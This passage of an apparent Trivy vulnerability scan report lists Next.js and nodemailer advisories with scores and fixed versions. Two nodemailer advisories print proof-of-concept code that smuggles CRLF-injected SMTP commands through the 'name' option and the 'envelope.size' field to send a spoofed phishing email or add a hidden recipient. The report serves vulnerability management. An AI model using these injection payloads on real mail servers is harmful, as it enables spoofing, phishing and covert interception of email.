x-nextjs-redirect, so the response became an unusable + redirect for normal clients. If the application was deployed behind a CDN or reverse + proxy that caches 3xx responses without varying on this header, a single attacker + request could poison the cached redirect response for the affected path. Subsequent + visitors could then receive a cached redirect response without a Location header, + causing a denial of service for that redirect path until the cache entry expired + or was purged. This vulnerability is fixed in 15.5.16 and 16.2.5. + remediation: https://avd.aquasec.com/nvd/cve-2026-44572 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id046 + - CWE-349 + raw: + VulnerabilityID: CVE-2026-44572 + VendorIDs: + - GHSA-3g8h-86w9-wvmq + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.16, 16.2.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44572 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:7a874ea313c88fdfc018ce40fae507cbe374abff06d472b78d118b05b82c32ac + Title: Next.js's Middleware / Proxy redirects can be cache-poisoned + Description: Next.js is a React framework for building full-stack web applications. + From 12.2.0 to before 15.5.16 and 16.2.5, an external client could send a x-nextjs-data + header on a normal request to a path handled by middleware that returns a redirect. + When that happened, the middleware/proxy could treat the request as a data request + and replace the standard Location redirect header with the internal x-nextjs-redirect + header. Browsers do not follow x-nextjs-redirect, so the response became an + unusable redirect for normal clients. If the application was deployed behind + a CDN or reverse proxy that caches 3xx responses without varying on this header, + a single attacker request could poison the cached redirect response for the + affected path. Subsequent visitors could then receive a cached redirect response + without a Location header, causing a denial of service for that redirect path + until the cache entry expired or was purged. This vulnerability is fixed in + 15.5.16 and 16.2.5. + Severity: LOW + CweIDs: *id046 + VendorSeverity: + ghsa: 1 + nvd: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L + V3Score: 3.7 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 5.9 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/releases/tag/v15.5.16 + - https://github.com/vercel/next.js/releases/tag/v16.2.5 + - https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq + - https://nvd.nist.gov/vuln/detail/CVE-2026-44572 + PublishedDate: '2026-05-13T16:16:58.8Z' + LastModifiedDate: '2026-05-15T15:46:08.98Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 6.6688 + epss: 8.0e-05 + epss_percentile: 0.00741 + is_kev: false + kev_due_date: null + components: + severity_score: 2 + epss_multiplier: 1.00032 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: f3c2cbad0f8c4f0a + ruleId: CVE-2026-44582 + severity: LOW + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Next.js vulnerable to cache poisoning via collisions in React Server Component + cache-busting + title: CVE-2026-44582 + description: Next.js is a React framework for building full-stack web applications. + From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can + be vulnerable to cache poisoning in deployments that rely on shared caches with + insufficient response partitioning. In affected conditions, collisions in the + _rsc cache-busting value can allow an attacker to poison cache entries so users + receive the wrong response variant for a given URL. This vulnerability is fixed + in 15.5.16 and 16.2.5. + remediation: https://avd.aquasec.com/nvd/cve-2026-44582 + references: [] + tags: + - vulnerability + - pkg:next@14.2.3 + risk: + cwe: &id047 + - CWE-328 + raw: + VulnerabilityID: CVE-2026-44582 + VendorIDs: + - GHSA-vfv6-92ff-j949 + PkgID: next@14.2.3 + PkgName: next + PkgIdentifier: + PURL: pkg:npm/next@14.2.3 + UID: 494c23d2c970c8b + InstalledVersion: 14.2.3 + FixedVersion: 15.5.16, 16.2.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2026-44582 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:5355cf71971ed497dc9db80439cbc15aecaca5f44147444b410ea52d3870a09d + Title: Next.js vulnerable to cache poisoning via collisions in React Server Component + cache-busting + Description: Next.js is a React framework for building full-stack web applications. + From 13.4.6 to before 15.5.16 and 16.2.5, React Server Component responses can + be vulnerable to cache poisoning in deployments that rely on shared caches with + insufficient response partitioning. In affected conditions, collisions in the + _rsc cache-busting value can allow an attacker to poison cache entries so users + receive the wrong response variant for a given URL. This vulnerability is fixed + in 15.5.16 and 16.2.5. + Severity: LOW + CweIDs: *id047 + VendorSeverity: + ghsa: 1 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N + V3Score: 3.7 + References: + - https://github.com/vercel/next.js + - https://github.com/vercel/next.js/releases/tag/v15.5.16 + - https://github.com/vercel/next.js/releases/tag/v16.2.5 + - https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949 + - https://nvd.nist.gov/vuln/detail/CVE-2026-44582 + PublishedDate: '2026-05-13T18:16:19.037Z' + LastModifiedDate: '2026-05-14T18:15:03.26Z' + context: + sbom: + name: next + version: 14.2.3 + path: /package-lock.json + compliance: + owaspTop10_2021: + - A02:2021 + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 6.671999999999999 + epss: 0.0002 + epss_percentile: 0.05498 + is_kev: false + kev_due_date: null + components: + severity_score: 2 + epss_multiplier: 1.0008 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 44b697423f0e8861 + ruleId: CVE-2025-14874 + severity: HIGH + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'nodemailer: Nodemailer: Denial of service via crafted email address header' + title: CVE-2025-14874 + description: A flaw was found in Nodemailer. This vulnerability allows a denial + of service (DoS) via a crafted email address header that triggers infinite recursion + in the address parser. + remediation: https://avd.aquasec.com/nvd/cve-2025-14874 + references: [] + tags: + - vulnerability + - pkg:nodemailer@6.10.1 + risk: + cwe: &id048 + - CWE-703 + raw: + VulnerabilityID: CVE-2025-14874 + VendorIDs: + - GHSA-rcmh-qjqh-p98v + PkgID: nodemailer@6.10.1 + PkgName: nodemailer + PkgIdentifier: + PURL: pkg:npm/nodemailer@6.10.1 + UID: c243d03ecfce3c20 + InstalledVersion: 6.10.1 + FixedVersion: 7.0.11 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-14874 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:966cf7be028923c9a0026859ad211dbe6884c63fd7e0af1c79f4c19409cbe98a + Title: 'nodemailer: Nodemailer: Denial of service via crafted email address header' + Description: A flaw was found in Nodemailer. This vulnerability allows a denial + of service (DoS) via a crafted email address header that triggers infinite recursion + in the address parser. + Severity: HIGH + CweIDs: *id048 + VendorSeverity: + ghsa: 3 + nvd: 3 + redhat: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + nvd: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H + V3Score: 7.5 + References: + - https://access.redhat.com/security/cve/CVE-2025-14874 + - https://bugzilla.redhat.com/show_bug.cgi?id=2418133 + - https://github.com/nodemailer/nodemailer + - https://github.com/nodemailer/nodemailer/commit/b61b9c0cfd682b6f647754ca338373b68336a150 + - https://github.com/nodemailer/nodemailer/security/advisories/GHSA-rcmh-qjqh-p98v + - https://nvd.nist.gov/vuln/detail/CVE-2025-14874 + - https://www.cve.org/CVERecord?id=CVE-2025-14874 + PublishedDate: '2025-12-18T09:15:44.87Z' + LastModifiedDate: '2026-01-08T03:15:43.19Z' + context: + sbom: + name: nodemailer + version: 6.10.1 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 23.477999999999998 + epss: 0.00155 + epss_percentile: 0.3573 + is_kev: false + kev_due_date: null + components: + severity_score: 7 + epss_multiplier: 1.0062 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 8c54dd19fd34e976 + ruleId: CVE-2025-13033 + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'nodemailer: Nodemailer: Email to an unintended domain can occur due to + Interpretation Conflict' + title: CVE-2025-13033 + description: A vulnerability was identified in the email parsing library due to + improper handling of specially formatted recipient email addresses. An attacker + can exploit this flaw by crafting a recipient address that embeds an external + address within quotes. This causes the application to misdirect the email to the + attacker's external address instead of the intended internal recipient. This could + lead to a significant data leak of sensitive information and allow an attacker + to bypass security filters and access controls. + remediation: https://avd.aquasec.com/nvd/cve-2025-13033 + references: [] + tags: + - vulnerability + - pkg:nodemailer@6.10.1 + risk: + cwe: &id049 + - CWE-1286 + raw: + VulnerabilityID: CVE-2025-13033 + VendorIDs: + - GHSA-mm7p-fcc7-pg87 + PkgID: nodemailer@6.10.1 + PkgName: nodemailer + PkgIdentifier: + PURL: pkg:npm/nodemailer@6.10.1 + UID: c243d03ecfce3c20 + InstalledVersion: 6.10.1 + FixedVersion: 7.0.7 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://avd.aquasec.com/nvd/cve-2025-13033 + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:718ace41991afee3a924eee3b40006635632701df5e1f2e2afabf15077a6d79b + Title: 'nodemailer: Nodemailer: Email to an unintended domain can occur due to + Interpretation Conflict' + Description: A vulnerability was identified in the email parsing library due to + improper handling of specially formatted recipient email addresses. An attacker + can exploit this flaw by crafting a recipient address that embeds an external + address within quotes. This causes the application to misdirect the email to + the attacker's external address instead of the intended internal recipient. + This could lead to a significant data leak of sensitive information and allow + an attacker to bypass security filters and access controls. + Severity: MEDIUM + CweIDs: *id049 + VendorSeverity: + ghsa: 2 + redhat: 2 + CVSS: + ghsa: + V40Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P + V40Score: 5.5 + redhat: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + V3Score: 7.5 + References: + - https://access.redhat.com/errata/RHSA-2026:15979 + - https://access.redhat.com/errata/RHSA-2026:3751 + - https://access.redhat.com/security/cve/CVE-2025-13033 + - https://bugzilla.redhat.com/show_bug.cgi?id=2402179 + - https://github.com/nodemailer/nodemailer + - https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626 + - https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87 + - https://nvd.nist.gov/vuln/detail/CVE-2025-13033 + - https://www.cve.org/CVERecord?id=CVE-2025-13033 + PublishedDate: '2025-11-14T20:15:45.957Z' + LastModifiedDate: '2026-05-11T13:16:10.037Z' + context: + sbom: + name: nodemailer + version: 6.10.1 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.349866666666665 + epss: 0.00031 + epss_percentile: 0.0896 + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.00124 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 314c4b93bbc126bb + ruleId: GHSA-vvjj-xcjg-gr5g + severity: MEDIUM + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: 'Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport + name Option (EHLO/HELO) ' + title: GHSA-vvjj-xcjg-gr5g + description: "### Summary\n\nNodemailer versions up to and including 8.0.4 are vulnerable\ + \ to SMTP command injection via CRLF sequences in the transport `name` configuration\ + \ option. The `name` value is used directly in the EHLO/HELO SMTP command without\ + \ any sanitization for carriage return and line feed characters (`\\r\\n`). An\ + \ attacker who can influence this option can inject arbitrary SMTP commands, enabling\ + \ unauthorized email sending, email spoofing, and phishing attacks.\n\n### Details\n\ + \nThe vulnerability exists in `lib/smtp-connection/index.js`. When establishing\ + \ an SMTP connection, the `name` option is concatenated directly into the EHLO\ + \ command:\n\n```javascript\n// lib/smtp-connection/index.js, line 71\nthis.name\ + \ = this.options.name || this._getHostname();\n\n// line 1336\nthis._sendCommand('EHLO\ + \ ' + this.name);\n```\n\nThe `_sendCommand` method writes the string directly\ + \ to the socket followed by `\\r\\n` (line 1082):\n\n```javascript\nthis._socket.write(Buffer.from(str\ + \ + '\\r\\n', 'utf-8'));\n```\n\nIf the `name` option contains `\\r\\n` sequences,\ + \ each injected line is interpreted by the SMTP server as a separate command.\ + \ Unlike the `envelope.from` and `envelope.to` fields which are validated for\ + \ `\\r\\n` (line 1107-1119), and unlike `envelope.size` which was recently fixed\ + \ (GHSA-c7w3-x93f-qmm8) by casting to a number, the `name` parameter receives\ + \ no CRLF sanitization whatsoever.\n\nThis is distinct from the previously reported\ + \ GHSA-c7w3-x93f-qmm8 (envelope.size injection) as it affects a different parameter\ + \ (`name` vs `size`), uses a different injection point (EHLO command vs MAIL FROM\ + \ command), and occurs at connection initialization rather than during message\ + \ sending.\n\nThe `name` option is also used in HELO (line 1384) and LHLO (line\ + \ 1333) commands with the same lack of sanitization.\n\n### PoC\n\n```javascript\n\ + const nodemailer = require('nodemailer');\nconst net = require('net');\n\n// Simple\ + \ SMTP server to observe injected commands\nconst server = net.createServer(socket\ + \ => {\n socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data\ + \ => {\n const lines = data.toString().split('\\r\\n').filter(l => l);\n\ + \ lines.forEach(line => {\n console.log('SMTP CMD:', line);\n\ + \ if (line.startsWith('EHLO') || line.startsWith('HELO'))\n \ + \ socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL\ + \ FROM'))\n socket.write('250 OK\\r\\n');\n else if\ + \ (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n\ + \ else if (line === 'DATA')\n socket.write('354 Go\\\ + r\\n');\n else if (line === '.')\n socket.write('250\ + \ OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221\ + \ Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n \ + \ socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0,\ + \ '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject\ + \ a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n\ + \ host: '127.0.0.1',\n port: port,\n secure: false,\n \ + \ name: 'legit.host\\r\\nMAIL FROM:\\r\\n'\n \ + \ + 'RCPT TO:\\r\\nDATA\\r\\n'\n + 'From: ceo@company.com\\\ + r\\nTo: victim@target.com\\r\\n'\n + 'Subject: Urgent\\r\\n\\r\\nPhishing\ + \ content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n from:\ + \ 'legit@example.com',\n to: 'legit-recipient@example.com',\n subject:\ + \ 'Normal email',\n text: 'Normal content'\n }, () => { server.close();\ + \ process.exit(0); });\n});\n```\n\nRunning this PoC shows the SMTP server receives\ + \ the injected MAIL FROM, RCPT TO, DATA, and phishing email content as separate\ + \ SMTP commands before the legitimate email is sent.\n\n### Impact\n\n**Who is\ + \ affected:** Applications that allow users or external input to configure the\ + \ `name` SMTP transport option. This includes:\n- Multi-tenant SaaS platforms\ + \ with per-tenant SMTP configuration\n- Admin panels where SMTP hostname/name\ + \ settings are stored in databases\n- Applications loading SMTP config from environment\ + \ variables or external sources\n\n**What can an attacker do:**\n1. **Send unauthorized\ + \ emails** to arbitrary recipients by injecting MAIL FROM and RCPT TO commands\n\ + 2. **Spoof email senders** by injecting arbitrary From headers in the DATA portion\n\ + 3. **Conduct phishing attacks** using the legitimate SMTP server as a relay\n\ + 4. **Bypass application-level controls** on email recipients, since the injected\ + \ commands are processed before the application's intended MAIL FROM/RCPT TO\n\ + 5. **Perform SMTP reconnaissance** by injecting commands like VRFY or EXPN\n\n\ + The injection occurs at the EHLO stage (before authentication in most SMTP flows),\ + \ making it particularly dangerous as the injected commands may be processed with\ + \ the server's trust context.\n\n**Recommended fix:** Sanitize the `name` option\ + \ by stripping or rejecting CRLF sequences, similar to how `envelope.from` and\ + \ `envelope.to` are already validated on lines 1107-1119 of `lib/smtp-connection/index.js`.\ + \ For example:\n\n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\\ + r\\n]/g, '');\n```" + remediation: https://github.com/advisories/GHSA-vvjj-xcjg-gr5g + references: [] + tags: + - vulnerability + - pkg:nodemailer@6.10.1 + raw: + VulnerabilityID: GHSA-vvjj-xcjg-gr5g + PkgID: nodemailer@6.10.1 + PkgName: nodemailer + PkgIdentifier: + PURL: pkg:npm/nodemailer@6.10.1 + UID: c243d03ecfce3c20 + InstalledVersion: 6.10.1 + FixedVersion: 8.0.5 + Status: fixed + SeveritySource: ghsa + PrimaryURL: https://github.com/advisories/GHSA-vvjj-xcjg-gr5g + DataSource: + ID: ghsa + Name: GitHub Security Advisory npm + URL: https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm + Fingerprint: sha256:17380daa219fcd2acb5ff13abdf591be99d5ba1498a2e827b85876cb23d42d77 + Title: 'Nodemailer Vulnerable to SMTP Command Injection via CRLF in Transport + name Option (EHLO/HELO) ' + Description: "### Summary\n\nNodemailer versions up to and including 8.0.4 are\ + \ vulnerable to SMTP command injection via CRLF sequences in the transport `name`\ + \ configuration option. The `name` value is used directly in the EHLO/HELO SMTP\ + \ command without any sanitization for carriage return and line feed characters\ + \ (`\\r\\n`). An attacker who can influence this option can inject arbitrary\ + \ SMTP commands, enabling unauthorized email sending, email spoofing, and phishing\ + \ attacks.\n\n### Details\n\nThe vulnerability exists in `lib/smtp-connection/index.js`.\ + \ When establishing an SMTP connection, the `name` option is concatenated directly\ + \ into the EHLO command:\n\n```javascript\n// lib/smtp-connection/index.js,\ + \ line 71\nthis.name = this.options.name || this._getHostname();\n\n// line\ + \ 1336\nthis._sendCommand('EHLO ' + this.name);\n```\n\nThe `_sendCommand` method\ + \ writes the string directly to the socket followed by `\\r\\n` (line 1082):\n\ + \n```javascript\nthis._socket.write(Buffer.from(str + '\\r\\n', 'utf-8'));\n\ + ```\n\nIf the `name` option contains `\\r\\n` sequences, each injected line\ + \ is interpreted by the SMTP server as a separate command. Unlike the `envelope.from`\ + \ and `envelope.to` fields which are validated for `\\r\\n` (line 1107-1119),\ + \ and unlike `envelope.size` which was recently fixed (GHSA-c7w3-x93f-qmm8)\ + \ by casting to a number, the `name` parameter receives no CRLF sanitization\ + \ whatsoever.\n\nThis is distinct from the previously reported GHSA-c7w3-x93f-qmm8\ + \ (envelope.size injection) as it affects a different parameter (`name` vs `size`),\ + \ uses a different injection point (EHLO command vs MAIL FROM command), and\ + \ occurs at connection initialization rather than during message sending.\n\n\ + The `name` option is also used in HELO (line 1384) and LHLO (line 1333) commands\ + \ with the same lack of sanitization.\n\n### PoC\n\n```javascript\nconst nodemailer\ + \ = require('nodemailer');\nconst net = require('net');\n\n// Simple SMTP server\ + \ to observe injected commands\nconst server = net.createServer(socket => {\n\ + \ socket.write('220 test ESMTP\\r\\n');\n socket.on('data', data => {\n\ + \ const lines = data.toString().split('\\r\\n').filter(l => l);\n \ + \ lines.forEach(line => {\n console.log('SMTP CMD:', line);\n\ + \ if (line.startsWith('EHLO') || line.startsWith('HELO'))\n \ + \ socket.write('250 OK\\r\\n');\n else if (line.startsWith('MAIL\ + \ FROM'))\n socket.write('250 OK\\r\\n');\n else if\ + \ (line.startsWith('RCPT TO'))\n socket.write('250 OK\\r\\n');\n\ + \ else if (line === 'DATA')\n socket.write('354 Go\\\ + r\\n');\n else if (line === '.')\n socket.write('250\ + \ OK\\r\\n');\n else if (line === 'QUIT')\n { socket.write('221\ + \ Bye\\r\\n'); socket.end(); }\n else if (line === 'RSET')\n \ + \ socket.write('250 OK\\r\\n');\n });\n });\n});\n\nserver.listen(0,\ + \ '127.0.0.1', () => {\n const port = server.address().port;\n\n // Inject\ + \ a complete phishing email via EHLO name\n const transport = nodemailer.createTransport({\n\ + \ host: '127.0.0.1',\n port: port,\n secure: false,\n \ + \ name: 'legit.host\\r\\nMAIL FROM:\\r\\n'\n \ + \ + 'RCPT TO:\\r\\nDATA\\r\\n'\n + 'From:\ + \ ceo@company.com\\r\\nTo: victim@target.com\\r\\n'\n + 'Subject:\ + \ Urgent\\r\\n\\r\\nPhishing content\\r\\n.\\r\\nRSET'\n });\n\n transport.sendMail({\n\ + \ from: 'legit@example.com',\n to: 'legit-recipient@example.com',\n\ + \ subject: 'Normal email',\n text: 'Normal content'\n }, ()\ + \ => { server.close(); process.exit(0); });\n});\n```\n\nRunning this PoC shows\ + \ the SMTP server receives the injected MAIL FROM, RCPT TO, DATA, and phishing\ + \ email content as separate SMTP commands before the legitimate email is sent.\n\ + \n### Impact\n\n**Who is affected:** Applications that allow users or external\ + \ input to configure the `name` SMTP transport option. This includes:\n- Multi-tenant\ + \ SaaS platforms with per-tenant SMTP configuration\n- Admin panels where SMTP\ + \ hostname/name settings are stored in databases\n- Applications loading SMTP\ + \ config from environment variables or external sources\n\n**What can an attacker\ + \ do:**\n1. **Send unauthorized emails** to arbitrary recipients by injecting\ + \ MAIL FROM and RCPT TO commands\n2. **Spoof email senders** by injecting arbitrary\ + \ From headers in the DATA portion\n3. **Conduct phishing attacks** using the\ + \ legitimate SMTP server as a relay\n4. **Bypass application-level controls**\ + \ on email recipients, since the injected commands are processed before the\ + \ application's intended MAIL FROM/RCPT TO\n5. **Perform SMTP reconnaissance**\ + \ by injecting commands like VRFY or EXPN\n\nThe injection occurs at the EHLO\ + \ stage (before authentication in most SMTP flows), making it particularly dangerous\ + \ as the injected commands may be processed with the server's trust context.\n\ + \n**Recommended fix:** Sanitize the `name` option by stripping or rejecting\ + \ CRLF sequences, similar to how `envelope.from` and `envelope.to` are already\ + \ validated on lines 1107-1119 of `lib/smtp-connection/index.js`. For example:\n\ + \n```javascript\nthis.name = (this.options.name || this._getHostname()).replace(/[\\\ + r\\n]/g, '');\n```" + Severity: MEDIUM + VendorSeverity: + ghsa: 2 + CVSS: + ghsa: + V3Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N + V3Score: 4.9 + References: + - https://github.com/nodemailer/nodemailer + - https://github.com/nodemailer/nodemailer/commit/0a43876801a420ca528f492eaa01bfc421cc306e + - https://github.com/nodemailer/nodemailer/releases/tag/v8.0.5 + - https://github.com/nodemailer/nodemailer/security/advisories/GHSA-vvjj-xcjg-gr5g + PublishedDate: '2026-04-08T15:05:20Z' + LastModifiedDate: '2026-04-08T15:05:20Z' + context: + sbom: + name: nodemailer + version: 6.10.1 + path: /package-lock.json + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 13.333333333333332 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 4 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 17548d349adde40e + ruleId: GHSA-c7w3-x93f-qmm8 + severity: LOW + tool: + name: trivy + version: unknown + location: + path: package-lock.json + startLine: 0 + message: Nodemailer has SMTP command injection due to unsanitized `envelope.size` + parameter + title: GHSA-c7w3-x93f-qmm8 + description: "### Summary\nWhen a custom `envelope` object is passed to `sendMail()`\ + \ with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated\ + \ directly into the SMTP `MAIL FROM` command without sanitization. This allows\ + \ injection of arbitrary SMTP commands, including `RCPT TO` \u2014 silently adding\ + \ attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js`\ + \ (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL\ + \ FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size\ + \ && this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n\ + }\n```\n\nThis contrasts with other envelope parameters in the same function that\ + \ ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\\ + r\\n<>]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`):\ + \ encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches\ + \ this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js`\ + \ (lines 854-858), which copies all non-standard envelope properties verbatim:\n\ + \n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key\ + \ => {\n if (!standardFields.includes(key)) {\n this._envelope[key]\ + \ = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command\ + \ string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value\ + \ terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by\ + \ default, Nodemailer constructs the envelope automatically from the message's\ + \ `from`/`to` fields and does not include `size`. This vulnerability requires\ + \ the application to explicitly pass a custom `envelope` object with a `size`\ + \ property to `sendMail()`. \nWhile this limits the attack surface, applications\ + \ that expose envelope configuration to users are affected.\n\n### PoC\nave the\ + \ following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net\ + \ = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP\ + \ server that logs raw commands\nconst server = net.createServer(socket => {\n\ + \ socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data',\ + \ chunk => {\n buffer += chunk.toString();\n const lines = buffer.split('\\\ + r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n\ + \ if (!line) continue;\n console.log('C:', line);\n \ + \ if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\\ + r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL\ + \ FROM')) {\n socket.write('250 OK\\r\\n');\n } else\ + \ if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\\ + n');\n } else if (line === 'DATA') {\n socket.write('354\ + \ Start\\r\\n');\n } else if (line === '.') {\n socket.write('250\ + \ OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n \ + \ socket.write('221 Bye\\r\\n');\n socket.end();\n \ + \ }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () => {\n \ + \ const port = server.address().port;\n console.log('SMTP server on port',\ + \ port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n \ + \ const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n\ + \ port,\n secure: false,\n tls: { rejectUnauthorized: false\ + \ },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n\ + \ to: 'recipient@example.com',\n subject: 'Normal email',\n \ + \ text: 'This is a normal email.',\n envelope: {\n from:\ + \ 'sender@example.com',\n to: ['recipient@example.com'],\n \ + \ size: '100\\r\\nRCPT TO:',\n },\n }, (err) =>\ + \ {\n if (err) console.error('Error:', err.message);\n console.log('\\\ + nExpected output above:');\n console.log(' C: MAIL FROM:\ + \ SIZE=100');\n console.log(' C: RCPT TO: <--\ + \ INJECTED');\n console.log(' C: RCPT TO:');\n\ + \ server.close();\n transporter.close();\n });\n});\n```\n\n\ + **Expected output:**\n```\nSMTP server on port 12345\nSending email with injected\ + \ RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM: SIZE=100\n\ + C: RCPT TO:\nC: RCPT TO:\nC: DATA\n\ + ...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:` line is injected\ + \ by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\ + \n### Impact\nThis is an SMTP command injection vulnerability. An attacker who\ + \ can influence the `envelope.size` property in a `sendMail()` call can:\n\n-\ + \ **Silently add hidden recipients** to outgoing emails via injected `RCPT TO`\ + \ commands, receiving copies of all emails sent through the affected transport\n\ + - **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to\ + \ send entirely separate emails through the server)\n- **Leverage the sending\ + \ organization's SMTP server reputation** for spam or phishing delivery\n\nThe\ + \ severity is mitigated by the fact that the `envelope` object must be explicitly\ + \ provided by the application. Nodemailer's default envelope construction from\ + \ message headers does not include `size`. Applications that pass through user-controlled\ + \ data to the envelope options (e.g., via API parameters, admin panels, or template\ + \ configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current);\ + \ likely all versions where `envelope.size` is supported." + remediation: https://github.com/advisories/GHSA-c7w3-x93f-qmm8 + references: [] + tags: + - vulnerability + - pkg:nodemailer@6.10.1 + raw: + VulnerabilityID: GHSA-c7w3-x93f-qmm8 + PkgID: nodemailer@6.10.1 + PkgName: nodemailer + PkgIdentifier: + PURL: pkg:npm/nodemailer@6.10.1 + UID: c243d03ecfce3c20 + 